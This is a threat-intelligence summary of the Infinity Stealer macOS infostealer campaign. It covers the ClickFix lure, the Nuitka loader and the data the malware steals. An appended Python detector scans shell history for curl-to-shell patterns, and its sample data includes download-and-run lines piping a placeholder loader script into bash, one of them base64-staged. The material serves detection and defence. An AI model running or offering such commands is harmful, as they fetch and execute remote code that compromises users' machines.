A new info-stealing campaign called Infinity Stealer targets macOS by delivering a Python payload compiled into a native executable with the Nuitka compiler and lures users via a ClickFix fake Cloudflare CAPTCHA. The payload performs anti-analysis checks, harvests browser credentials, macOS Keychain entries, cryptocurrency wallets and plaintext developer secrets, and exfiltrates data to a C2 via HTTP while notifying operators via Telegram; users should never paste unknown commands into Terminal. #InfinityStealer #Nuitka
Key points
- Infinity Stealer targets macOS with a Python payload compiled into a native binary using Nuitka.
- Attackers use a ClickFix fake Cloudflare CAPTCHA and a base64-obfuscated curl command to trick users into executing a Bash loader.
- The Nuitka-built Mach-O loader contains a zstd-compressed archive that extracts the UpdateHelper.bin infostealer.
- The malware performs anti-analysis checks and can steal browser credentials, macOS Keychain entries, cryptocurrency wallets, screenshots, and plaintext developer secrets.
- Stolen data is exfiltrated via HTTP POST to a C2 and operators receive Telegram notifications; users should never paste unknown Terminal commands.
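The ClickFix lure described above (a base64-wrapped curl command that feeds a Bash loader) leaves a recognisable shape in shell history and process-creation telemetry. The following added example is not from the report; it scores constructed sample command lines against that pattern, decoding any base64 token to see whether a downloader hides inside, and the URL and history lines are placeholders.

```python
import base64
import re

# Heuristics for the ClickFix-style one-liner: a downloader or a base64
# decode stage piped straight into a shell interpreter (constructed patterns).
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
PIPE_TO_SHELL = re.compile(r"\|\s*(?:sudo\s+)?(?:ba|z)?sh\b")
DOWNLOADER = re.compile(r"\b(?:curl|wget)\b")
B64_DECODE = re.compile(r"base64\s+(?:-d|--decode|-D)\b")


def decode_b64_tokens(cmd):
    """Return the decoded text of every base64-looking token that decodes cleanly."""
    out = []
    for tok in B64_TOKEN.findall(cmd):
        try:
            out.append(base64.b64decode(tok, validate=True).decode("utf-8"))
        except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
            continue
    return out


def classify_command(cmd):
    """Score one command line; returns (number_of_hits, list_of_reasons)."""
    reasons = []
    if DOWNLOADER.search(cmd) and PIPE_TO_SHELL.search(cmd):
        reasons.append("downloader piped directly into a shell")
    if B64_DECODE.search(cmd) and PIPE_TO_SHELL.search(cmd):
        reasons.append("base64 decode stage piped into a shell")
    for text in decode_b64_tokens(cmd):
        if DOWNLOADER.search(text):
            reasons.append("base64 payload decodes to a downloader command")
            break
    return len(reasons), reasons


def scan_history(lines):
    """Return (line, reasons) for every history line with at least one hit."""
    hits = []
    for line in lines:
        score, reasons = classify_command(line)
        if score:
            hits.append((line, reasons))
    return hits


# Constructed sample shell history; example.invalid is a placeholder, not an indicator.
_STAGED = base64.b64encode(b"curl -fsSL http://example.invalid/loader.sh | bash").decode()
SAMPLE_HISTORY = [
    "ls -la ~/Library/Application\\ Support",
    "brew upgrade",
    f"echo {_STAGED} | base64 -d | bash",
    "curl -fsSL http://example.invalid/verify.sh | sh",
    "git commit -m 'bump version'",
]
```

Running `scan_history` over a user's `~/.zsh_history` or over command lines from EDR process events flags both the staged and the direct variant while leaving ordinary developer commands untouched.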